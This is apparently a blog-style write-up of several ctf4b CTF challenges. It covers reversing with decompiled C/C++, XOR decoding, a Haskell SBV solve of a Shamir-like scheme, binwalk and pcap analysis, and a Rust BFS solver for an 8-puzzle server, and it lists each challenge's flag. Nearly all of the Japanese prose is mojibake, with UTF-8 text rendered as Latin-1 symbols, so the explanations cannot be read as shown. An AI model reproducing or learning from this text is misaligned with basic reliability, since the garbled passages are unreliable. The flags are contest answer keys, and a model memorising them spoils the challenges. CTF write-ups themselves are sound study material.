ã¾ãšã“ã“ã¾ã§ã§ã‚‚ã®ã™ã”ã大変ã ã£ãŸãŒã€ã¤ãŽã«ã€ã“れをãªã‚“ã¨ã‹ã—ã¦å®Ÿéš›ã®ãƒ—ãƒã‚°ãƒ©ãƒ ã‹ã‚‰æŠ½å‡ºã—ãªã‘ã‚Œã°ãªã‚‰ãªã„。定数部分ã¾ã§å…¥ã‚Œã‚‹ã¨å¼ã®å½¢ã«æ¡ˆå¤–ãƒãƒªã‚¨ãƒ¼ã‚·ãƒ§ãƒ³ãŒã‚ã‚‹ã®ã¨ã€é€†ã‚³ãƒ³ãƒ‘イラãŒä¸€è²«ã—ãŸå½¢ã®å¼ã‚’出ã—ã¦ãã‚Œã¦ã„ã‚‹ã‚ã‘ã§ã¯ãªã„ã®ã§ã€ç°¡å˜ãªæ£è¦è¡¨ç¾ã ã¨é›£ã—ãã†ã ã£ãŸã€‚
ãªã®ã§ã€ä»Šå›žã¯Haskellã®ãƒ‘ターンマッãƒã§ç°¡ç´„化ã™ã‚‹ã“ã¨ã«ã—ãŸã€‚language-cパッケージã§ãƒ‘ーズã—ã¦ã€ãれを今回ã®ã‚³ãƒ¼ãƒ‰ã«å¿…è¦ãªASTã ã‘パターンマッãƒã‚’書ã„ã¦ã€ã„ã„ã‹ã’ã‚“ã«ãƒˆãƒ©ãƒãƒ¼ã‚¹ã™ã‚‹ã€‚ãã†ã—ã¦ã§ããŸã®ãŒã“れ。
書ã„ã¦ã¦æ€ã£ãŸã®ã ãŒã€language-cã¯ã€ã“ã†ã„ã£ãŸã„ã„ã‹ã’ã‚“ãªå‡¦ç†ã‚’書ãã®ã¯ã‚ã¡ã‚ƒãã¡ã‚ƒé¢å€’ã 。
ã§ã€ã“ã‚Œã«å…ƒã®ã§ã‹ã„コードを食ã‚ã›ã¦ã‚„ã‚‹ã¨ã€
ã“ã‚“ãªæ„Ÿã˜ã®ã€è¦‹é•ãˆã‚‹ã»ã©ç¶ºéº—ãªã‚³ãƒ¼ãƒ‰ãŒå‡ºã¦ãる。f_addã¨ã‹ã®é–¢æ•°ã¯å…ˆã»ã©ã®åˆ¶ç´„å¼ã§ã€
ulong f_add(ulong a, ulong b, ulong c) {
return a + b == c;
}
ulong f_mul(ulong a, ulong b, ulong c) {
return a * b == c;
}
ulong f_xor(ulong a, ulong b, ulong c) {
return a ^ b == c;
}
ã“ã‚“ãªå®šç¾©ã«ãªã£ã¦ã„る。ã§ã€ã‚ˆã†ã‚„ãis_correctã®å…¨è²ŒãŒæ˜Žã‚‰ã‹ã«ãªã£ãŸã®ã§ã€ã“れを満ãŸã™ãƒ‡ãƒ¼ã‚¿ã‚’探ã™ã€‚å˜ç´”ãªåˆ¶ç´„å¼ãªã®ã§ã€åˆ¶ç´„ソルãƒãƒ¼ã«è§£ã‹ã›ã‚ˆã†ã€‚z3ã®å‡ºç•ªã 。
ã¾ãšã€ç°¡ç´„化ã•ã‚ŒãŸãƒ—ãƒã‚°ãƒ©ãƒ ã‚’é©å½“ã«ã„ã˜ã£ã¦ã€æ¡ä»¶ã ã‘抜ã出ã—ãŸãƒ‡ãƒ¼ã‚¿ã‚’作る。
ã“れをèªã‚“ã§å…ˆé 部分ã®æ–‡å—ã®åˆ¶ç´„ã¨åˆã‚ã›ã¦ã€åˆ¶ç´„を組ã¿ç«‹ã¦ã¦SMTソルãƒãƒ¼ã«é£Ÿã‚ã›ã‚‹ã‚³ãƒ¼ãƒ‰ã‚’書ã。
ãã—ã¦å®Ÿè¡Œã™ã‚‹ï¼
ç”ãˆãŒå‡ºã¦ãã‚‹ï¼
ã„ã‚„ã€é•·ã„é“ã®ã‚Šã ã£ãŸã€‚大変ã ãŸã‘ã©ã€ãƒ•ãƒ©ã‚°ãŒå‡ºã¦ããŸçž¬é–“ã¯ä½•ã¨ã‚‚ã„ãˆãªã„ã™ãŒã™ãŒã—ã„気分ã«ãªã‚ŒãŸã€‚
出ã¦ããŸãƒ•ãƒ©ã‚°ã¯ã€ctf4b{5ymbol1c_3xecuti0n_1s_3ffect1ve_4ga1nst_l1n34r_0p3r4ti0n}。
ã„ã‚„ã‚ã€ãã†ã§ã™ã‚ˆã。やã£ã¦ã‚‹ã“ã¨ã¯è¦ã™ã‚‹ã«ãã†ã„ã†ã“ã¨ãªã®ã§ã€ã‚·ãƒ³ãƒœãƒªãƒƒã‚¯å®Ÿè¡Œã§ã§ããªã„ã¯ãšãŒãªã„。ã—ã‹ã—シンボリック実行フレームワークよã知らãªã„ã®ã§ã€ãªã‚“ã‹è‡ªåŠ›ã§ã‚„ã‚‹ã“ã¨ã«ãªã£ã¦ã—ã¾ã£ãŸã€‚ãã®è¾ºä½¿ãˆã‚‹ã‚ˆã†ã«ã—ã¦ãŠããŸã„。
Reversing: SecconPass
ã¨ã‚Šã‚ãˆãšé€†ã‚³ãƒ³ãƒ‘イルã™ã‚‹ã¨ã€C++ã£ã½ã„コードãŒå‡ºã¦ããŸã€‚ã“ã®å•é¡Œã®ã‚³ãƒ³ã‚»ãƒ—トã¯ãã†ã„ã†ã‚¢ãƒ¬ãªã‚“ã ã‚ã†ã‹ã€‚
void main(void) { bool bVar1; int iVar2; basic_ostream *this; ulong uVar3; Entry *this_00; ulong uVar4; long lVar5; long in_FS_OFFSET; int local_138; int local_134; int local_130; int local_12c; undefined8 local_128; undefined8 local_120; undefined8 local_118; FILE *local_110; basic_string local_108 [32]; basic_string local_e8 [32]; basic_string local_c8 [32]; basic_string local_a8 [32]; basic_string local_88 [32]; Entry local_68 [72]; undefined8 local_20; local_20 = *(undefined8 *)(in_FS_OFFSET + 0x28); basic_string(); local_138 = 0; /* try { // try from 001019ca to 00101a70 has its CatchHandler @ 00101f99 */ local_110 = fopen("/dev/urandom","rb"); if (local_110 == (FILE *)0x0) { this = operator<<<std--char_traits<char>> ((basic_ostream *)__TMC_END__,"Error open /dev/urandom"); operator<<((basic_ostream<char,std--char_traits<char>> *)this,endl<char,std--char_traits<char>>) ; /* WARNING: Subroutine does not return */ exit(1); } fread(&local_138,8,1,local_110); operator<<<std--char_traits<char>> ((basic_ostream *)__TMC_END__,"****************\n** SecconPass **\n****************\n"); do { while( true ) { while( true ) { operator<<<std--char_traits<char>>((basic_ostream *)__TMC_END__,"Action: "); operator>><char,std--char_traits<char>,std--allocator<char>>((basic_istream *)cin,local_108) ; /* try { // try from 00101a85 to 00101a89 has its CatchHandler @ 00101dfe */ local_134 = stoi(local_108,(ulong *)0x0,10); if (local_134 != 1) break; /* try { // try from 00101c3c to 00101c56 has its CatchHandler @ 00101f99 */ operator<<<std--char_traits<char>>((basic_ostream *)__TMC_END__,"Index: "); operator>><char,std--char_traits<char>,std--allocator<char>>((basic_istream *)cin,local_108) ; /* try { // try from 00101c6b to 00101cdf has its CatchHandler @ 00101eaa */ local_12c = stoi(local_108,(ulong *)0x0,10); if ((local_12c < 0) || (uVar4 = SEXT48(local_12c), uVar3 = size((vector<Entry,std--allocator<Entry>> *)ve), uVar3 <= uVar4)) { bVar1 = false; } else { bVar1 = true; } if (bVar1) { this_00 = (Entry *)operator[]((vector<Entry,std--allocator<Entry>> *)ve,(long)local_12c); show(this_00); } else { operator<<<std--char_traits<char>>((basic_ostream *)__TMC_END__,"Invalid index\n"); } } if (1 < local_134) break; if (local_134 == 0) { basic_string(); basic_string(); /* try { // try from 00101af0 to 00101b86 has its CatchHandler @ 00101e84 */ operator<<<std--char_traits<char>>((basic_ostream *)__TMC_END__,"ID: "); operator>><char,std--char_traits<char>,std--allocator<char>>((basic_istream *)cin,local_e8); operator<<<std--char_traits<char>>((basic_ostream *)__TMC_END__,"PASS: "); operator>><char,std--char_traits<char>,std--allocator<char>>((basic_istream *)cin,local_c8); uVar3 = length(); iVar2 = local_138; if (uVar3 < 0x14) { operator<<<std--char_traits<char>>((basic_ostream *)__TMC_END__,"Too short!!\n"); } else { basic_string(local_88); /* try { // try from 00101b9b to 00101b9f has its CatchHandler @ 00101e62 */ basic_string(local_a8); /* try { // try from 00101bb4 to 00101bb8 has its CatchHandler @ 00101e4e */ Entry(local_68,(basic_string)0x58,(basic_string)0x78,iVar2); ~basic_string((basic_string<char,std--char_traits<char>,std--allocator<char>> *)local_a8); ~basic_string((basic_string<char,std--char_traits<char>,std--allocator<char>> *)local_88); /* try { // try from 00101be2 to 00101be6 has its CatchHandler @ 00101e73 */ push_back((vector<Entry,std--allocator<Entry>> *)ve,local_68); ~Entry(local_68); } ~basic_string((basic_string<char,std--char_traits<char>,std--allocator<char>> *)local_c8); ~basic_string((basic_string<char,std--char_traits<char>,std--allocator<char>> *)local_e8); } else { LAB_00101de5: /* try { // try from 00101df3 to 00101df7 has its CatchHandler @ 00101f99 */ operator<<<std--char_traits<char>>((basic_ostream *)__TMC_END__,"Invalid action\n"); } } if (local_134 != 2) { if (local_134 == 3) { /* WARNING: Subroutine does not return */ exit(0); } goto LAB_00101de5; } /* try { // try from 00101cf3 to 00101d0d has its CatchHandler @ 00101f99 */ operator<<<std--char_traits<char>>((basic_ostream *)__TMC_END__,"Index: "); operator>><char,std--char_traits<char>,std--allocator<char>>((basic_istream *)cin,local_108); /* try { // try from 00101d22 to 00101dd8 has its CatchHandler @ 00101f23 */ local_130 = stoi(local_108,(ulong *)0x0,10); if ((local_130 < 0) || (uVar4 = SEXT48(local_130), uVar3 = size((vector<Entry,std--allocator<Entry>> *)ve), uVar3 <= uVar4)) { bVar1 = false; } else { bVar1 = true; } if (bVar1) { lVar5 = (long)local_130; local_128 = begin((vector<Entry,std--allocator<Entry>> *)ve); local_120 = operator+((__normal_iterator<Entry*,std--vector<Entry,std--allocator<Entry>>> *) &local_128,lVar5); __normal_iterator<Entry*> ((__normal_iterator<Entry_const*,std--vector<Entry,std--allocator<Entry>>> *) &local_118,(__normal_iterator *)&local_120); erase((vector<Entry,std--allocator<Entry>> *)ve,SUB81(local_118,0)); } else { operator<<<std--char_traits<char>>((basic_ostream *)__TMC_END__,"Invalid index\n"); } } while( true ); }
èªã‚“ã æ„Ÿã˜ã€ã‚³ãƒžãƒ³ãƒ‰0ã§æ¤œç´¢ã€ã‚³ãƒžãƒ³ãƒ‰1ã§ã‚¨ãƒ³ãƒˆãƒªè¿½åŠ ã€ã‚³ãƒžãƒ³ãƒ‰2ã§ã‚¨ãƒ³ãƒˆãƒªå‰Šé™¤ã€ã‚³ãƒžãƒ³ãƒ‰3ã§çµ‚了ã¨è¨€ã£ãŸæ„Ÿã˜ã 。ã“ã®ã¾ã¾ã ã¨ã©ã“ã«ã‚‚フラグã¯ç¾ã‚ã‚Œãªã„ã—フラグã®åˆ¤å®šã‚’ã—ã¦ã„ã‚‹ã¨ã“ã‚ã‚‚ãªã„。
エントリã§å…¥åŠ›ã•ã‚ŒãŸãƒ‘スã¯Entry::encrypt()ã¨ã„ã†é–¢æ•°ã§æš—å·åŒ–ã•ã‚Œã¦ä¿å˜ã•ã‚Œã‚‹ã€‚
void encrypt(int param_1) { long lVar1; byte *pbVar2; undefined4 in_register_0000003c; long lVar3; int local_1c; lVar3 = CONCAT44(in_register_0000003c,param_1); local_1c = 0; while( true ) { lVar1 = length(); if (lVar1 - 4U <= (ulong)(long)local_1c) break; pbVar2 = (byte *)operator[]((basic_string<char,std--char_traits<char>,std--allocator<char>> *) (lVar3 + 0x20),(long)local_1c); *pbVar2 = *(byte *)(lVar3 + 0x43) ^ *pbVar2; pbVar2 = (byte *)operator[]((basic_string<char,std--char_traits<char>,std--allocator<char>> *) (lVar3 + 0x20),(long)(local_1c + 1)); *pbVar2 = *(byte *)(lVar3 + 0x41) ^ *pbVar2; pbVar2 = (byte *)operator[]((basic_string<char,std--char_traits<char>,std--allocator<char>> *) (lVar3 + 0x20),(long)(local_1c + 2)); *pbVar2 = *(byte *)(lVar3 + 0x43) ^ *pbVar2; pbVar2 = (byte *)operator[]((basic_string<char,std--char_traits<char>,std--allocator<char>> *) (lVar3 + 0x20),(long)(local_1c + 3)); *pbVar2 = *(byte *)(lVar3 + 0x41) ^ *pbVar2; local_1c = local_1c + 4; } return; }
è¦ã™ã‚‹ã«ä½•ã‚’ã‚„ã£ã¦ã„ã‚‹ã®ã‹ã¨ã„ã†ã¨ã€byteåž‹2è¦ç´ ã®ã‚ーã«ã‚ˆã£ã¦ã€å˜ã«æ–‡å—毎㫠s[i] ^= key[i%2] ã¨ã—ã¦xorを掛ã‘ã¦ã„ã‚‹ã ã‘ã®ã‚ˆã†ã 。
ãƒã‚¤ãƒŠãƒªã‚’覗ãã¨ã€ãªã‚“ã‹å¤‰ãªã‚¨ãƒ³ã‚³ãƒ¼ãƒ‰ã•ã‚ŒãŸæ–‡å—列ã®ã‚ˆã†ãªã‚‚ã®ãŒã‚ã£ã¦ã€ã“ã‚ŒãŒã©ã“ã§ä½¿ã‚ã‚Œã¦ã„ã‚‹ã®ã‹èª¿ã¹ã¦ã¿ã‚‹ã¨ã€destructor() ã¨ã„ã†ã¨ã“ã‚ã§ä½¿ã‚ã‚Œã¦ã„ãŸã€‚ã“ã‚Œã¯ãƒ—ãƒã‚°ãƒ©ãƒ 終了時ã«å‘¼ã³å‡ºã•ã‚Œã‚‹ãŒã€ã“ã®ä¸ã§ã€ãªãœã‹ã“れを引数ã«ã—ãŸã‚¨ãƒ³ãƒˆãƒªãŒç™»éŒ²ã•ã‚Œã¦ã€ã™ãã«å‰Šé™¤ã•ã‚Œã¦ã„る。ãªã‚“ã®ãŸã‚ã«ã“ã‚“ãªã“ã¨ã‚’ã—ã¦ã„ã‚‹ã®ã‹ã¯åˆ†ã‹ã‚‰ãªã„。
よã分ã‹ã‚‰ãªã„ãŒã€è¦ã™ã‚‹ã«ã“ã‚Œã¯ã‚¨ãƒ³ã‚³ãƒ¼ãƒ‰ã•ã‚ŒãŸæ–‡å—列ã ã¨ã„ã†ã“ã¨ãªã®ã ã‚ã†ã‹ã€‚ã¨ã‚Šã‚ãˆãšå…ˆé 付近ã®ãƒ‡ãƒ¼ã‚¿ã‚’ "ctf4b"ã¨xorã™ã‚‹ã¨ã€ãªã‚“ã¨ãªããã†è¨€ã†æ„Ÿã˜ã£ã½ã‹ã£ãŸã®ã§ã€å…ˆé 2æ–‡å—ã®ã‚ーã§å…¨ä½“ã‚’xorã—ãŸã‚‰ãªã‚“ã¨ãªãフラグã£ã½ã„ã‚‚ã®ãŒå‡ºã¦ããŸã€‚
出ã¦ããŸãƒ•ãƒ©ã‚°ã¯ ctf4b{Impl3m3nt3d_By_Cp1u5p1u5Z。
ãªã‚“ã‹å¾Œã‚ã®æ–¹ãŒå£Šã‚Œã¦ã„る・・・ãŒå•é¡Œè‡ªä½“ãŒå£Šã‚Œã¦ã„ãŸã‚‰ã—ã„ã®ã§ã“ã‚Œã§OKã¿ãŸã„ã 。C++ã§å®Ÿè£…ã•ã‚ŒãŸã‚³ãƒ¼ãƒ‰ï½¥ï½¥ï½¥ã¨ã¯ã„ãˆãªã‚“ã‹ã‚¤ãƒžã‚¤ãƒè¶£æ—¨ãŒã‚ˆã分ã‹ã‚‰ãªã‹ã£ãŸã—ã“ã‚Œã§è‰¯ã‹ã£ãŸã®ã ã‚ã†ã‹ï¼Ÿ
Crypto: [warmup] So Tierd
base64ã£ã½ã„入力ãŒä¸Žãˆã‚‰ã‚Œã‚‹ã®ã§ã€ãƒ‡ã‚³ãƒ¼ãƒ‰ã™ã‚‹ã¨zlib compressed dataãŒå‡ºã¦ãる。zlib compressed dataã‚’decompressã™ã‚‹ã¨ä»Šåº¦ã¯base64ãŒå‡ºã¦ãる。ãã—ã¦ã¾ãŸãれをデコードã™ã‚‹ã¨zlib compressed dataãŒå‡ºã¦ãã¦ã€ãれを繰り返ã—ã¦ã„ãã¨æœ€çµ‚çš„ã«ãƒ•ãƒ©ã‚°ãŒå‡ºã¦ããŸã€‚
Crypto: Party
フラグを暗å·åŒ–ã™ã‚‹Pythonプãƒã‚°ãƒ©ãƒ ã¨æš—å·åŒ–ã•ã‚ŒãŸãƒ•ãƒ©ã‚°ãŒè²°ãˆã‚‹ã®ã§ã€å…ƒã®ãƒ•ãƒ©ã‚°ã‚’求ã‚ã‚‹å•é¡Œã€‚
æš—å·åŒ–プãƒã‚°ãƒ©ãƒ ã§ã¯ä¹±æ•°ã‚’5個作ã£ã¦ã¦ã€ãã‚Œã¨ãƒ•ãƒ©ã‚°ã‚’åˆã‚ã›ãŸ6ã¤ã®æ•´æ•°ã‚’flag, a, b, x, y, zã¨ã™ã‚‹ã¨ã€x, y, z, flag+a*x+b*x^2, flag+a*y+b*y^2, flag+a*z+b*z^2 ã®æ•´æ•°ãŒä¸Žãˆã‚‰ã‚Œã‚‹ã®ã§ã€å¤‰æ•°6ã¤ã«å¼ãŒ6個ã‚ã‚‹ã®ã§ã¾ã‚ç†å±ˆã¨ã—ã¦ã¯æ™®é€šã«è§£ã‘る。
解ã‘ã‚‹ã¯ãšã ã‘ã©è€ƒãˆã‚‹ã®ã¯ã‚ã‚“ã©ã‹ã£ãŸã®ã§ã€SMTソルãƒãƒ¼ã«è§£ã„ã¦ã‚‚らã†ã“ã¨ã«ã—ãŸã€‚
import Data.SBV [(x, fx), (y, fy), (z, fz)] = <input data...> main :: IO () main = print =<< sat problem problem :: Symbolic () problem = do flag <- sInteger "flag" a <- sInteger "a" b <- sInteger "b" constrain $ fx .== flag+a*x+b*x^2 constrain $ fy .== flag+a*y+b*y^2 constrain $ fz .== flag+a*z+b*z^2
å¼ã‚’書ãã ã‘ã§ã™ã‚“ãªã‚Šã¨ã„ã¦ãã‚Œã¦ã‚‚ã†è‡ªåˆ†ã§ä½•ã‚‚考ãˆã‚‰ã‚Œãªããªã‚‹ã€‚
出ã¦ããŸãƒ•ãƒ©ã‚°ã¯ ctf4b{just_d0ing_sh4mir}。
ãªã‚“ã‹ãã†ã„ã†ã®ãŒã‚ã‚‹ã‚“ã§ã™ã‹ã・・・。
Misc: [warmup] Welcome
å…¬å¼IRCãƒãƒ£ãƒ³ãƒãƒ«ã«ç¹‹ãã ã‘ã®ã‚„ã¤ã€‚
Misc: containers
与ãˆã‚‰ã‚ŒãŸãƒ•ã‚¡ã‚¤ãƒ«ã«ã‚’覗ãã¨ã‚ã£ã¡ã‚ƒæ²¢å±±PNGãŒãã®ã¾ã¾å…¥ã£ã¦ã‚‹ã‚ˆã†ã«è¦‹ãˆãŸã®ã§ã€binwalkã§åˆ‡ã‚Šå‡ºã—ã¦ã¿ã‚‹ã¨ã€æ–‡å—ãŒæ›¸ã‹ã‚ŒãŸãƒ•ã‚¡ã‚¤ãƒ«ãŒä¸€æ¯å‡ºã¦ããŸã€‚ãれを繋ã’ã‚‹ã¨ãƒ•ãƒ©ã‚°ã«ãªã£ãŸã€‚
ctf4b{e52df60c058746a66e4ac4f34db6fc81}
ã©ã†ã„ã†æ„味ãªã‚“ã ã‚ã†ã‹ã€‚
Misc: Dump
pcapã®ãƒ€ãƒ³ãƒ—ã¨æ€ã—ãファイルãŒä¸Žãˆã‚‰ã‚Œã‚‹ã®ã§è¦—ã„ã¦ã¿ã‚‹ã¨ã€webshellã¨ã„ã†ã‚„ã¤ã§hexdumpã§ãƒ•ã‚¡ã‚¤ãƒ«ã‚’覗ã„ã¦ã‚‹ã£ã½ã„ã®ãŒå‡ºã¦ãる。hexdumpã®å¼•æ•°èª¿ã¹ã¦ã©ã†ã„ã†ãƒ•ã‚©ãƒ¼ãƒžãƒƒãƒˆã§å‡ºã¦ã‚‹ã®ã‹èª¿ã¹ã¦ãƒ‡ã‚³ãƒ¼ãƒ‰ã™ã‚‹ã¨ã€tar.gzファイルãŒå‡ºã¦ãã¦ã€ãれを解ç”ã™ã‚‹ã¨ã¨ã¦ã‚‚爽やã‹ãªå†™çœŸã®jpgファイルã«ãƒ•ãƒ©ã‚°ãŒæ›¸ã‹ã‚Œã¦ã„ãŸã€‚
フラグ㯠ctf4b{hexdump_is_very_useful}。
ãã‚Œã¯çŸ¥ã£ã¦ã‚‹ã€‚
Misc: Sliding puzzle
指定ã•ã‚ŒãŸã‚µãƒ¼ãƒãƒ¼ã«ç¹‹ãã¨ã€ã“ã‚“ãªæ„Ÿã˜ã®
---------------- | 0 | 2 | 3 | | 6 | 7 | 1 | | 8 | 4 | 5 | ----------------
8パズルã®å•é¡ŒãŒãŸãã•ã‚“é™ã£ã¦ãã‚‹ã®ã§ã“れを解ã‘ã¨ã„ã†å•é¡Œã€‚æ‰‹é †ã¯0 : 上ã€1 : å³ã€2 : 下ã€3 : å·¦ã§ã‚¨ãƒ³ã‚³ãƒ¼ãƒ‰ã™ã‚‹ã€‚
ã‚„ã‚‹ã“ã¨ã¯ã£ãã‚Šã—ã¦ã„ã¦ã€8パズルã¯ç›¤é¢æ•°é«˜ã€…9!ã—ã‹ãªã„ã‹ã‚‰BFSã§ä¸€çž¬ã¨ã‚ã‹ã‚‹ã—別ã«é›£ã—ã„訳ã§ã¯ãªã„ã‹ã‚‰ã€ã¾ã¨ã‚‚ãªå•é¡Œï¼Ÿã®ä¸ã§ã¯ã“ã‚ŒãŒä¸€ç•ªç°¡å˜ãªæ°—ãŒã™ã‚‹ã€‚
探索ãªã®ã§Rustã§æ›¸ã„ãŸã€‚ã“ã®ãらã„ã®è¦æ¨¡ãªã‚‰åˆ¥ã«Pythonã§æ›¸ã„ã¦ã‚‚ãã‚“ãªã«æ™‚é–“ã¯é£Ÿã‚ãªã„æ°—ã¯ã™ã‚‹ã€‚ã§ã‚‚Pythonã¯ã‚ˆã分ã‹ã‚‰ãªã„ã‹ã‚‰å‡ã£ãŸã‚³ãƒ¼ãƒ‰ã‚’書ããŸããªã‹ã£ãŸã€‚
ソケット周りã®ã‚³ãƒ¼ãƒ‰ãŒã‚„ã£ã±ã‚Šã©ã†ã—ã¦ã‚‚ã¡ã‚‡ã£ã¨ã‚ã‚“ã©ãã•ããªã‚‹ã®ã§ã€æŽ¢ç´¢ã ã‘Rustã§æ›¸ã„ã¦ã€é€šä¿¡éƒ¨åˆ†ã¯Pythonã®pwntoolsã§æ›¸ã„ã¦ã€Rustã®ãƒ—ãƒã‚»ã‚¹ã‚’èªã‚“ã§ã‚‚良ã‹ã£ãŸæ°—ã‚‚ã™ã‚‹ã€‚ã§ã‚‚ã¾ã‚ã€ã“ã‚Œãらã„ãªã‚‰ãŸã„ã—ãŸã“ã¨ã¯ç„¡ã„ã‹ã‚‰ã©ã£ã¡ã§ã‚‚ã„ã„æ°—ã¯ã™ã‚‹ã€‚ã‚ã¨Rustã§ã„ã„åŠ æ¸›ã«é€šä¿¡ã¾ã‚ã‚Šã®ã‚³ãƒ¼ãƒ‰ã‚’書ã‘るよã†ãªãƒ©ã‚¤ãƒ–ラリãŒã‚ã£ãŸã‚Šã™ã‚‹ã¨ã“ã†ã„ã†ã®ã‚„ã‚‹ã®ã«è‰¯ã„ã®ã‹ãªã‚ã¨ã‚‚æ€ã£ãŸã€‚
use std::io::{Write, Read}; use std::net::*; fn main() -> Result<(), Box<std::error::Error>> { let mut stream = TcpStream::connect("133.242.50.201:24912")?; loop { let mut buf = vec![0; 1024]; let len = stream.read(&mut buf)?; let s = String::from_utf8(buf[0..len].to_owned())?; print!("{}", s); let v = s .chars() .map(|c| if c.is_ascii_digit() { c } else { ' ' }) .collect::<String>() .split_whitespace() .map(|w| w.parse::<u32>().unwrap()) .collect::<Vec<_>>(); println!("{:?}", v); let ans = solve(&v); let ans = ans.iter().map(|i| format!("{}", i)).collect::<Vec<_>>().join(","); write!(&mut stream, "{}", dbg!(ans)); } Ok(()) } fn encode(bd: &Vec<u32>) -> u64 { (0..9).map(|i| (bd[i] as u64) << (i * 4)).sum() } fn solve(bd: &Vec<u32>) -> Vec<u32> { let start = encode(bd); let goal = encode(&vec![0, 1, 2, 3, 4, 5, 6, 7, 8]); let mut q = std::collections::VecDeque::new(); q.push_back(start); let mut prev = std::collections::HashMap::<u64, (u32, u64)>::new(); prev.insert(start, (0, 0)); const VECT: &[(i32, i32)] = &[(0, -1), (1, 0), (0, 1), (-1, 0)]; while let Some(bd) = q.pop_front() { assert!(prev.contains_key(&bd)); if bd == goal { println!("FOUND"); break; } let mut x = 0; let mut y = 0; for i in 0..9 { if ((bd >> (i * 4)) & 15) == 0 { x = i % 3; y = i / 3; } } for dir in 0..4 { let (vx, vy) = VECT[dir as usize]; let nx = x as i32 + vx; let ny = y as i32 + vy; if nx >= 0 && nx < 3 && ny >= 0 && ny < 3 { let nbd = swap(bd, x, y, nx as usize, ny as usize); if !prev.contains_key(&nbd) { prev.insert(nbd, (dir, bd)); q.push_back(nbd); } } } } let mut cur = goal; let mut ans = vec![]; while cur != start { let (mv, next) = prev.get(&cur).unwrap(); cur = *next; ans.push(*mv); } ans.reverse(); ans } fn swap(bd: u64, x: usize, y: usize, nx: usize, ny: usize) -> u64 { let p = (y * 3 + x) * 4; let np = (ny * 3 + nx) * 4; bd & !(15 << p) & !(15 << np) | (((bd >> p) & 15) << np) | (((bd >> np) & 15) << p) }
100å•è§£ãã¨ãƒ•ãƒ©ã‚°ãŒç¾ã‚ã‚ŒãŸã€‚ctf4b{fe6f512c15daf77a2f93b6a5771af2f723422c72} ã“れもã©ã†ã„ã†æ„味ãªã‚“ã ã‚ã†ã€‚
